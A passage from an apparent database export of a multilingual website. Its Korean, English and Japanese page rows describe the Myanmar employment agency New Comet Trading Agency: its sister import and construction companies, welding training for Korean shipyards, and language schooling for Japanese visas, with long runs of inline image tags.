data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-1_3.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-2_0.jpg\" data-align=\"center\" data-entity-uuid=\"1c875d61-a0c2-42a5-b28e-ff5255dd8ad3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-3_0.jpg\" data-align=\"center\" data-entity-uuid=\"80dbdd8c-e8cd-465b-b26c-e04b67966c31\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-4_0.jpg\" data-align=\"center\" data-entity-uuid=\"d71b12e7-3d70-4a59-9715-2de3919ebc7d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-5_0.jpg\" data-align=\"center\" data-entity-uuid=\"8a845720-846c-47c3-b9e9-e1f3098f65fc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-6_0.jpg\" data-align=\"center\" data-entity-uuid=\"b24eb73f-1d94-4450-81a5-afb6790a13f7\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-7_0.jpg\" data-align=\"center\" data-entity-uuid=\"51eb9cfb-ea78-4874-a2fb-af8d0ff97c38\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-8_0.jpg\" data-align=\"center\" data-entity-uuid=\"873929b2-4641-4686-834e-aa5ef5948b3a\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-9_0.jpg\" data-align=\"center\" data-entity-uuid=\"aa07abd4-d198-4e2c-af81-6f1eae19da17\" data-entity-type=\"file\" alt=\"\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/NC-10_0.jpg\" data-entity-uuid=\"41991b55-c606-4270-9a2f-eb3871ba0f31\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-11_0.jpg\" data-align=\"center\" data-entity-uuid=\"7f57bb37-0f0d-4aea-be9b-4a52fc0adf6f\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-12_0.jpg\" data-align=\"center\" data-entity-uuid=\"88251347-e029-437d-9ff8-51f406d4402c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-13_0.jpg\" data-align=\"center\" data-entity-uuid=\"b1eadb3f-c0b7-445e-aee6-f7523ba1158d\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-14_0.jpg\" data-align=\"center\" data-entity-uuid=\"676ffad7-c9a6-4d2a-9969-98e69477570c\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-15_0.jpg\" data-align=\"center\" data-entity-uuid=\"1131bddf-f0bb-4121-8c20-574a69c2e43d\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-16_0.jpg\" data-align=\"center\" data-entity-uuid=\"b0805653-8b57-493a-b7da-98b99b135795\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-17_0.jpg\" data-align=\"center\" data-entity-uuid=\"6e057327-e93f-41cc-a966-3bbfdb7046b0\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-18_0.jpg\" data-align=\"center\" data-entity-uuid=\"e2e7295f-d240-4c94-90f6-b52bc0c587bc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-19_0.jpg\" data-align=\"center\" data-entity-uuid=\"1a08f51b-fce7-42d3-ae81-1ad523dfd3e1\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-20_0.jpg\" data-align=\"center\" data-entity-uuid=\"df97660b-54a9-403b-9796-90dcfbb580bd\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-21_0.jpg\" data-align=\"center\" data-entity-uuid=\"456bf806-4df8-483a-9bb9-78b3e285cd70\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-22_0.jpg\" data-align=\"center\" data-entity-uuid=\"81098b50-a382-45b2-b96a-44bb91384739\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-23_0.jpg\" data-align=\"center\" data-entity-uuid=\"6c66b62a-1389-4f5c-b496-bd6f105c4259\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-24_0.jpg\" data-align=\"center\" data-entity-uuid=\"f8bf2dde-b25f-46bb-bc27-d95b894955e3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-25_0.jpg\" data-align=\"center\" data-entity-uuid=\"547038de-6845-4549-9311-0f02a922f630\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26_0.jpg\" data-align=\"center\" data-entity-uuid=\"9c4a4a7d-81b0-4e33-b434-9e141438631c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-27_0.jpg\" data-align=\"center\" data-entity-uuid=\"ab06b9a1-42d7-4f07-9be5-8a825c7fca60\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-28_0.jpg\" data-align=\"center\" data-entity-uuid=\"6e769851-41be-4e61-8110-5290daf2cda3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29_0.jpg\" data-align=\"center\" data-entity-uuid=\"ca9cad00-b0a2-4251-9585-5c48526f9748\" data-entity-type=\"file\"><img data-entity-uuid=\"4b011db5-14e8-4a56-a6da-e6fe90c2e0f3\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-40_3.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-41_0.jpg\" data-align=\"center\" data-entity-uuid=\"5f5513ae-611d-4f95-aaba-1227dc176b2c\" data-entity-type=\"file\">', '', 'full_html'),
('page', 0, 23, 295, 'ko', 0, '<p>저희 ``New Comet Trading\'\' 회사는 2004년에 설립되어 사업자등록번호(295/2004-2005)로 영업을 시작하였습니다.<br>뉴코멧 해외직업소개회사는 2023년 외국인고용업 면허를 취득하여 서비스 활동을 시작하였습니다.</p><p><br>저희 뉴코멧 해외직업소개회사 \"New Comet Overseas Employment Agency\"는자매 회사인 &nbsp;제야뉴코멧 자동차 판매 및 서비스 회사, 뉴코멧회사등 기업들과 협력하여 경제통상자원부에서 &nbsp;차량 수입허가를 신청했고 각종 상용트럭, 관광 산업 및 운송에 사용되는 다양한 유형의 버스 및 기계를 일본에서 직접 구매 판매하는 사업을 25년 이상 &nbsp;종사해 왔고 나라를 위한 정한 세금들을 냈습니다. 게다가100 명 이상의 직원에게 고용 기회를 제공했습니다.</p><p><br>또한 쌍둥이 회사인 뉴코멧건설 회사, 제야슈웨삐띡 건설 회사, 아웅네원 회사들은 정부 부처로부터 입찰 (tender)을 받고 건설 작업을 하는 동안 200명 이상의 직원에게 고용 기회를 제공했습니다.</p><p><br>저희 \"뉴코멧 해외 직업 소개회사\"는 한국 조선소로 취업을 희망하는 미얀마 각지에서 온 소수민족 형제들을 교통통신부 산하의 씬마락 (Sinmalike) 조선소에서 유능한 트레이너들와 함께 실력있는 용접공이 되도록 수업을 제공하고 있으며 관련 기업체로 취업할 수 있게 도와주고 있습니다.또한, 두바이, 말레이시아, 싱가포르, 태국, 일본 같은 국가에서 일하기를 원하는 청년들에게 취업 기회를 받알 수 있도록 &nbsp;서비스들을 제공하고 있습니다.</p><p><br>New Comet Trading Agency Co., Ltd.는 미얀마의 젊은 치누들이 일본의 개발한 첨단 기술을 배우고 꿈을 실현할 수 있도록 필요한 교육을 제공하고 돕고 있습니다.</p><p><br>일본으로 취업비자, 연수비자로 가기 위해 필요한 자격시험(JLPT, JFT, NAT-TEST, TOP-J)에 합격할 수 있도록 어학당도 개설 및 교육을 지원하고 있습니다.</p><p><br>저희는”뉴코멧 해외직업소개회사” 는 미얀마에서 우수한 기능인력을 배출하여 해외로 파견하는 서비스를 제공하기 위해 끊임없이 노력하고 있습니다.</p><img src=\"/sites/default/files/inline-images/1-NC_1.jpg\" data-align=\"center\" data-entity-uuid=\"7375e186-cf58-4d75-b92f-9eab22b78118\" data-entity-type=\"file\"><img data-entity-uuid=\"95208b24-3912-47cb-b94e-77132a3ec814\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-1_4.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-2_1.jpg\" data-align=\"center\" data-entity-uuid=\"4dc4f426-e69c-44ec-8caf-4b1931fdf8b8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-3_1.jpg\" data-align=\"center\" data-entity-uuid=\"f854e47f-d973-4dd9-8219-826768f1adc8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-4_1.jpg\" data-align=\"center\" data-entity-uuid=\"13857fa4-2c7a-4d5b-990d-45454d4ce664\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-5_1.jpg\" data-align=\"center\" data-entity-uuid=\"c4d3c7e6-c2a6-47c1-a423-afbb8fed637d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-6_1.jpg\" data-align=\"center\" data-entity-uuid=\"55284a88-e85b-4812-9ae7-807f898d55f7\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-7_1.jpg\" data-align=\"center\" data-entity-uuid=\"c2b2e5f4-fb99-4766-b2fd-9b2d6e680823\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-8_1.jpg\" data-align=\"center\" data-entity-uuid=\"0dfa63f3-2933-4e8b-842c-fb4562d7176d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-9_1.jpg\" data-align=\"center\" data-entity-uuid=\"16e03ce5-055f-4f8f-8be5-1f11619e8445\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-10_1.jpg\" data-align=\"center\" data-entity-uuid=\"2a148620-3a3b-4fb9-8117-f6376f457d08\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-11_1.jpg\" data-align=\"center\" data-entity-uuid=\"87fee7fa-f754-4ed1-8b4c-e407735f3467\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-12_1.jpg\" data-align=\"center\" data-entity-uuid=\"9a88bbba-3b28-41fd-a8a8-84cca1770e30\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-13_1.jpg\" data-align=\"center\" data-entity-uuid=\"cbc0b282-1b93-4f31-a52e-e00ed85f6499\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-14_1.jpg\" data-align=\"center\" data-entity-uuid=\"8bba0525-3d17-4730-ac6a-43174e89662b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-15_1.jpg\" data-align=\"center\" data-entity-uuid=\"5f6a15dd-8d0a-4102-b60c-36467fd6e2a0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-16_1.jpg\" data-align=\"center\" data-entity-uuid=\"91065924-7e1b-40a5-a985-ab3a738841c7\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-17_1.jpg\" data-align=\"center\" data-entity-uuid=\"cd43fa36-c108-48c2-b25d-dc1862c70dea\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-18_1.jpg\" data-align=\"center\" data-entity-uuid=\"525a5838-a4d8-457f-97be-230841a5f654\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-19_1.jpg\" data-align=\"center\" data-entity-uuid=\"4b653764-4d92-4445-8e27-7614f6ef64a5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-20_1.jpg\" data-align=\"center\" data-entity-uuid=\"e3ff3d3c-7c9e-462a-91f1-6c6a9aa06067\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-21_1.jpg\" data-align=\"center\" data-entity-uuid=\"d8dbbc11-8a02-4d92-beee-82d3aba0c040\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-22_1.jpg\" data-align=\"center\" data-entity-uuid=\"48756932-2a18-4eed-9166-8ae3d494765e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-23_1.jpg\" data-align=\"center\" data-entity-uuid=\"f184253a-5469-4443-ad8a-350db9f4c92d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-24_1.jpg\" data-align=\"center\" data-entity-uuid=\"a06d2513-b3b1-4975-8202-104c9b9ddf54\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-25_1.jpg\" data-align=\"center\" data-entity-uuid=\"3b495714-4bd4-411e-ae46-cc161a43ecd1\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26_1.jpg\" data-align=\"center\" data-entity-uuid=\"d495b5fa-e307-41df-b301-614c7b02a674\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-27_1.jpg\" data-align=\"center\" data-entity-uuid=\"ad5dc94c-17ae-411f-99e9-6d1b74a22e99\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-28_1.jpg\" data-align=\"center\" data-entity-uuid=\"c3de86e8-0aee-413b-b2d5-5ba6506e8954\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29_1.jpg\" data-align=\"center\" data-entity-uuid=\"7535e5c5-67cc-42fe-a4b1-8360b4e324d5\" data-entity-type=\"file\"><img data-entity-uuid=\"be405527-a576-421a-af55-70724f3aed8b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-40_4.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-41_1.jpg\" data-align=\"center\" data-entity-uuid=\"f37e9936-ed46-428b-abbb-f585384d411f\" data-entity-type=\"file\">', '', 'full_html'),
('page', 0, 23, 296, 'en', 0, '<p>We, ``NEW COMET TRADING\'\' company, was established in 2004 and started operating with company registration number (295/2004-2005).</p><p>NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) licence was obtained in 2023 and since then, the company has started to carry out service activities.</p><p>We, ``NEW COMET TRADING AGENCY\'\' company, which is a brother company, such as, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, NEW COMET Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan, and have paid the taxes set for the state. More than 100 employees were given employment opportunities.</p><p>In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.</p><p>Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.</p><p>In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, and Japan.</p><p>We at NEW COMET TRADING AGENCY Co.Ltd, are assisting on responsible for learning about Japan\'s developed advanced technologies, cultures and expressing their personal abilities and goals for the young generation in Myanmar.</p><p>In order to successfully pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.</p><p>We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</p><img src=\"/sites/default/files/inline-images/1-NC.jpg\" data-align=\"center\" data-entity-uuid=\"1427dc29-05a8-43fe-8ca3-965d16ed0865\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-1.jpg\" data-align=\"center\" data-entity-uuid=\"b8d07038-b5d4-49f5-ac18-2a68edcf66f2\" data-entity-type=\"file\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/NC-2.jpg\" data-align=\"center\" data-entity-uuid=\"80e04f60-8b31-432d-8034-205f1107df2f\" data-entity-type=\"file\"><img data-entity-uuid=\"c61b6e94-5844-4d70-b108-0025c10e8c01\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-3_3.jpg\" data-align=\"center\"><img data-entity-uuid=\"22d0dbf7-a2af-4fe3-8bc8-24a817d8c9fb\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-4_2.jpg\" data-align=\"center\"><img data-entity-uuid=\"34eb5e97-7887-40fb-a532-ea7158607de6\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-5_2.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-6.jpg\" data-align=\"center\" data-entity-uuid=\"99025867-1165-45b9-987a-162bd77afc85\" data-entity-type=\"file\"><img data-entity-uuid=\"8e2efe47-a4a1-4b3b-9d28-11019136c724\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-7_2.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-8.jpg\" data-align=\"center\" data-entity-uuid=\"6eb2dc0f-9c32-4d4f-bb0a-7648ab39ab11\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-9.jpg\" data-align=\"center\" data-entity-uuid=\"810afaf6-ff82-44e0-b231-927e848a41cc\" data-entity-type=\"file\" alt=\"\"><img data-entity-uuid=\"57f9e79c-83d7-4db7-a975-0311fbe63328\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-10_2.jpg\" data-align=\"center\"><img data-entity-uuid=\"70254dac-c742-4d7a-8423-eaf0e5f62cb8\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-11_2.jpg\" data-align=\"center\"><img data-entity-uuid=\"3bdc401a-2f52-4f83-8f7a-647bd7c11600\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-12_2.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-13.jpg\" data-align=\"center\" data-entity-uuid=\"aeca03e1-f9a3-4e0e-b7b6-1660dbd60c8a\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-14.jpg\" data-align=\"center\" data-entity-uuid=\"99606141-7880-4242-9f8a-39d779b7c3f4\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-15.jpg\" data-entity-uuid=\"ebdb65e0-ba0b-4289-b787-403a08a7137c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-16.jpg\" data-entity-uuid=\"89d8fc77-4e52-42ff-81bd-8cbddd3dfa5f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-17.jpg\" data-align=\"center\" data-entity-uuid=\"9f81c640-bf3c-45f2-85d1-72c351c50da7\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-18.jpg\" data-align=\"center\" data-entity-uuid=\"eaba01fe-9f4f-4c78-b4f7-f966c16106b2\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-19.jpg\" data-align=\"center\" data-entity-uuid=\"28845640-721c-4663-99e4-3fe89a3fc124\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-20.jpg\" data-align=\"center\" data-entity-uuid=\"310286d4-6f8d-425b-b758-ba0c7a46a78c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-21.jpg\" data-align=\"center\" data-entity-uuid=\"2a48e008-54b7-4ada-9bec-ec877fb83f54\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-22.jpg\" data-align=\"center\" data-entity-uuid=\"010a0743-1136-4045-92de-ffa7bb03b84f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-23.jpg\" data-align=\"center\" data-entity-uuid=\"61230765-b357-46fe-a38d-1699896c48d6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-24.jpg\" data-align=\"center\" data-entity-uuid=\"f940eee5-3ae3-4b94-9585-f317c7d9bcb8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-25.jpg\" data-entity-uuid=\"e21d162f-6f5a-4935-bbcb-5001a8cba017\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26.jpg\" data-align=\"center\" data-entity-uuid=\"00ae4e32-0e8a-4187-9efe-abfe0a26501b\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-27.jpg\" data-align=\"center\" data-entity-uuid=\"2989d3e0-2393-49ad-a73e-684f01edf0fa\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-28.jpg\" data-align=\"center\" data-entity-uuid=\"56339d67-286d-4418-9789-87b2f0456386\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29.jpg\" data-align=\"center\" data-entity-uuid=\"b26a003e-c37f-4b76-bb1a-3b646ab2f771\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-40_2.jpg\" data-align=\"center\" data-entity-uuid=\"e50b34c5-96f9-44a3-bc19-61e501f16184\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-41.jpg\" data-align=\"center\" data-entity-uuid=\"d65558d3-211e-4a10-8124-f4f01a42f4b5\" data-entity-type=\"file\">', '', 'full_html'),
('page', 0, 23, 296, 'ja', 0, '<p>当社は2004年に設立され、登録ID(295/2004-2005)を取得し、以来サービスの提供を行ってきました。そして、2023年に当社ニューコメットトレンディング海外エージェンシーを設立し、運営を開始しました。<br>当社はニュー コメット トレーディング グループの一部である。その中で最大規模のゼーヤーニューコメット自動車売買&amp;サービス株式会社は自動車の輸入許可を得て、建設現場用のトラックや、交通機関として使われるバスや様々な機械を日本から直接輸入し、販売する事業を25年間続けてきました。納税もきちんと行い、100人の従業員を雇用するまでになりました。<br>また、グループの一部であるニューコメット建築株式会社、ゼッヤシェピーティー建築株式会社、アウンネーウィン建築株式会社も政府から許可を多く受け取り、合わせて200人以上の人材紹介に成功しております。<br>現在、ニューコメットトレンディング海外エージェンシーでは、ミャンマー全国から来た民族を問わずに韓国の造船所で働きたい人たちに対して、シンマライ湾岸で経験豊富な指導者たちの下で訓練を受ける機会を提供し、仕事の紹介を行っています。<br>さらに、ドバイ、マレーシア、シンガポール、タイ、日本への就職もサポートしています。<br>ミャンマーの若者たちが自分らしさを保ちながら、自分に合った仕事を見つけ、日本の技術を学ぶことができるように支援を続けています。日本語能力試験(JLPT, JFT, NAT-TEST, TOP-J)に合格した学生に対しては、ワークビザや研修ビザを取得するための支援を提供しています。<br>我々ニューコメットトレーディング海外エージェンシーは、経験豊富で能力の高い研修生を育成し、海外の仕事チャンスを提供することに尽力して参ります。</p><img src=\"/sites/default/files/inline-images/1-NC_0.jpg\" data-align=\"center\" data-entity-uuid=\"7147154e-6c57-4d0c-99dc-5e6a1ad56cc8\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-1_3.jpg\" data-align=\"center\" data-entity-uuid=\"20d75075-fb13-4332-9836-0cdbf49b8dfd\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-2_0.jpg\" data-align=\"center\" data-entity-uuid=\"1c875d61-a0c2-42a5-b28e-ff5255dd8ad3\" data-entity-type=\"file\"><img data-entity-uuid=\"e7288834-ff3b-480c-9234-fc6593057fbd\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-3_4.jpg\" data-align=\"center\"><img data-entity-uuid=\"03602aa7-45bb-4473-9c3d-d87c28205132\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-4_3.jpg\" data-align=\"center\"><img data-entity-uuid=\"189e39d2-6713-4114-942b-44bd26eec52f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-5_3.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-6_0.jpg\" data-align=\"center\" data-entity-uuid=\"b24eb73f-1d94-4450-81a5-afb6790a13f7\" data-entity-type=\"file\" alt=\"\"><img data-entity-uuid=\"df47ee75-79b9-4616-81c0-0e34a78c90ef\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-7_3.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-8_0.jpg\" data-align=\"center\" data-entity-uuid=\"873929b2-4641-4686-834e-aa5ef5948b3a\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-9_0.jpg\" data-align=\"center\" data-entity-uuid=\"aa07abd4-d198-4e2c-af81-6f1eae19da17\" data-entity-type=\"file\" alt=\"\"><img data-align=\"center\" data-entity-uuid=\"663f2f7b-fe72-4e59-9d3b-c336ed24793f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-10_3.jpg\"><img data-entity-uuid=\"2b72d0df-bb39-4ae6-b065-54b7507416ad\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-11_3.jpg\" data-align=\"center\"><img data-entity-uuid=\"7a91e859-2d7e-464a-b848-a660987c0ce3\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-12_3.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-13_0.jpg\" data-align=\"center\" data-entity-uuid=\"b1eadb3f-c0b7-445e-aee6-f7523ba1158d\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-14_0.jpg\" data-align=\"center\" data-entity-uuid=\"676ffad7-c9a6-4d2a-9969-98e69477570c\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-15_0.jpg\" data-align=\"center\" data-entity-uuid=\"1131bddf-f0bb-4121-8c20-574a69c2e43d\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-16_0.jpg\" data-align=\"center\" data-entity-uuid=\"b0805653-8b57-493a-b7da-98b99b135795\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-17_0.jpg\" data-align=\"center\" data-entity-uuid=\"6e057327-e93f-41cc-a966-3bbfdb7046b0\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-18_0.jpg\" data-align=\"center\" data-entity-uuid=\"e2e7295f-d240-4c94-90f6-b52bc0c587bc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-19_0.jpg\" data-align=\"center\" data-entity-uuid=\"1a08f51b-fce7-42d3-ae81-1ad523dfd3e1\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-20_0.jpg\" data-align=\"center\" data-entity-uuid=\"df97660b-54a9-403b-9796-90dcfbb580bd\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-21_0.jpg\" data-align=\"center\" data-entity-uuid=\"456bf806-4df8-483a-9bb9-78b3e285cd70\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-22_0.jpg\" data-align=\"center\" data-entity-uuid=\"81098b50-a382-45b2-b96a-44bb91384739\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-23_0.jpg\" data-align=\"center\" data-entity-uuid=\"6c66b62a-1389-4f5c-b496-bd6f105c4259\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-24_0.jpg\" data-align=\"center\" data-entity-uuid=\"f8bf2dde-b25f-46bb-bc27-d95b894955e3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-25_0.jpg\" data-align=\"center\" data-entity-uuid=\"547038de-6845-4549-9311-0f02a922f630\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26_0.jpg\" data-align=\"center\" data-entity-uuid=\"9c4a4a7d-81b0-4e33-b434-9e141438631c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-27_0.jpg\" data-align=\"center\" data-entity-uuid=\"ab06b9a1-42d7-4f07-9be5-8a825c7fca60\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-28_0.jpg\" data-align=\"center\" data-entity-uuid=\"6e769851-41be-4e61-8110-5290daf2cda3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29_0.jpg\" data-align=\"center\" data-entity-uuid=\"ca9cad00-b0a2-4251-9585-5c48526f9748\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-40_3.jpg\" data-align=\"center\" data-entity-uuid=\"4b011db5-14e8-4a56-a6da-e6fe90c2e0f3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-41_0.jpg\" data-align=\"center\" data-entity-uuid=\"5f5513ae-611d-4f95-aaba-1227dc176b2c\" data-entity-type=\"file\">', '', 'full_html'),
